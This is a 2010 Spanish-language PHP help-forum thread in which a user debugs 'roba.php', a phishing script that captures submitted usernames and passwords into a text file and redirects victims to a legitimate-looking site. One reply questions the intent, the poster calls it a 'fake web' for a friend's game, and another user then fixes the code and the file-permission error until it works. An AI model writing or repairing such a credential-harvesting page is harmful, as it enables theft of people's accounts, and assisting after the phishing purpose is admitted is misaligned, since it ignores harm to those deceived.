Foros del Web » Programando para Internet » PHP »

PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

Estas en el tema de PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme! en el foro de PHP en Foros del Web. Buenas chicos. soy nueva en php y estoy creando una pagina con redireccion. el error es este. P Parse error: syntax error, unexpected T_STRING in ...
  #1 (permalink)  
Antiguo 30/12/2010, 00:10
 
Fecha de Ingreso: diciembre-2010
Mensajes: 4
Antigüedad: 13 años, 3 meses
Puntos: 0
PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

Buenas chicos.
soy nueva en php y estoy creando una pagina con redireccion.

el error es este.

P Parse error: syntax error, unexpected T_STRING in E:\home\forumpokem3\Web\roba.php on line 17.

Código PHP:
<?php
$login
=$_POST["name"];
$pass=$_POST["pass"];
$guardar=fopen("Cuentas.txt",a);
fwrite($guardar,"
"
.$login."
"
.$pass);
fclose($guardar);
echo 
"<META HTTP-EQUIV='refresh' CONTENT='1; url=http://www.Pagina.loquesea.com'>";
?>
uso este host...
http://www.uolhost.com.br/

y lo curioso es qe no hay linea 17 ._. help me please.. :S
  #2 (permalink)  
Antiguo 30/12/2010, 00:14
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 17 años, 10 meses
Puntos: 2135
Tema movido desde Configuración PHP a PHP
  #3 (permalink)  
Antiguo 30/12/2010, 00:26
 
Fecha de Ingreso: diciembre-2010
Ubicación: valencia
Mensajes: 203
Antigüedad: 13 años, 4 meses
Puntos: 11
Respuesta: PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

La verdad que igual sere mal pensado pero.......

Cita:
roba.php
$login=$_POST["name"];
$pass=$_POST["pass"];
$guardar=fopen("Cuentas.txt",a)
y luego redireccion a "una pagina" que asumo sera la original. ¿cual es tu intencion?
  #4 (permalink)  
Antiguo 30/12/2010, 00:34
 
Fecha de Ingreso: diciembre-2010
Mensajes: 4
Antigüedad: 13 años, 3 meses
Puntos: 0
Respuesta: PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

mi intencion es un fake web. para un juego de un amigo. no es con fines malignos es a peticion de el administrador del juego xfavor ayudame T_T
  #5 (permalink)  
Antiguo 30/12/2010, 01:52
 
Fecha de Ingreso: octubre-2009
Mensajes: 245
Antigüedad: 14 años, 6 meses
Puntos: 17
Respuesta: PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

Código PHP:
Ver original
  1. $login=$_POST["name"];
  2. $pass=$_POST["pass"];
  3. $guardar=fopen("Cuentas.txt",a);
  4. fwrite($guardar,"
  5. ".$login."
  6. ".$pass);
  7. fclose($guardar);
  8. echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://www.Pagina.loquesea.com'>";

La parte donde haces el fwrite cambiala por
Código PHP:
Ver original
  1. fwrite($guardar,$login.$pass);

Lo de la redireccion consulta en el manual la funcion header

Saludos
  #6 (permalink)  
Antiguo 30/12/2010, 02:16
 
Fecha de Ingreso: diciembre-2010
Mensajes: 4
Antigüedad: 13 años, 3 meses
Puntos: 0
Respuesta: PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

rning: fopen(Cuentas.txt) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in E:\home\forumpokem3\Web\roba.php on line 7
PHP Warning: fclose(): supplied argument is not a valid stream resource in E:\home\forumpokem3\Web\roba.php on line 11

porque dice eso ahora? :S
  #7 (permalink)  
Antiguo 30/12/2010, 02:19
 
Fecha de Ingreso: octubre-2009
Mensajes: 245
Antigüedad: 14 años, 6 meses
Puntos: 17
Respuesta: PHP Parse error: syntax error, unexpected T_STRING ._. Ayudenme!

Cita:
Iniciado por TakaCore Ver Mensaje
rning: fopen(Cuentas.txt) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in E:\home\forumpokem3\Web\roba.php on line 7
PHP Warning: fclose(): supplied argument is not a valid stream resource in E:\home\forumpokem3\Web\roba.php on line 11

porque dice eso ahora? :S
No tienes permisos de escritura en el archivo, cambia los permisos del archivo para que pueda escribir el usuario que ejecuta el servicio de httpd
  #8 (permalink)  
Antiguo 30/12/2010, 02:21
 
Fecha de Ingreso: diciembre-2010
Mensajes: 4
Antigüedad: 13 años, 3 meses
Puntos: 0
Como se hace eso? estoy perdida ._.* no tienes msn ? T.T

LO HIZEEEEEEEEEEEEEE LO HIZE LO HIZE LO HIZE aaaaaaaa :$:$:$ Gracias de vdd!! :D

Última edición por GatorV; 30/12/2010 a las 15:21

Etiquetas: parse, syntax
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 15:10.